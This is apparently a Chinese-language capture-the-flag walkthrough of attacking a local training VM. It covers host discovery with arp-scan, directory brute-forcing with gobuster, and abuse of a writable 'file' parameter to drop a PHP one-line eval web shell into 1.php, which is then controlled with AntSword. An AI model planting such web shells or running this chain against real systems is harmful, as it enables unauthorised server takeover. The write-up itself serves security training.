将这一关的镜像导入虚拟机,出现以下页面表示导入成功
以root身份打开kali终端,输入以下命令,查看靶机ip
arp-scan -l
根据得到的靶机ip,浏览器访问进入环境
我们从当前页面没有得到有用的信息,尝试扫描后台
发现有一个后台目录文件robots.txt,尝试访问
没有得到有用的信息,尝试端口扫描
分别访问这几个端口,也没有什么发现,我们换个思路
还是将重点放回80端口,因为robot.txt提示我们继续找找,可能是因为我们的字典太小了,我们换个扫描器换个字典试下,利用kali自带的最大的一个字典
cd /usr/share/wordlists/dirbuster/
ls -al
gobuster dir -u http://192.168.164.147/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php
提示没有安装gobuster(颜色没变)
先更新apt,再安装gobuster
apt update
apt install gobuster
运行gobuster查看是否安装成功
再次执行上面的那条命令
尝试后缀名拼接到ip后面访问
在输入框中随便输入,发现输入的数据被显示到页面上,抓包
发现网站会将提交的内容追加到graffiti.txt文件中,由于file参数是可控的,那么我们可以修改文件名改变文件上传的路径,尝试上传一句话木马到1.php中
<?php @eval($_POST[a]);?>
浏览器访问1.php
蚁剑连接
测试连接成功,添加,成功获取权限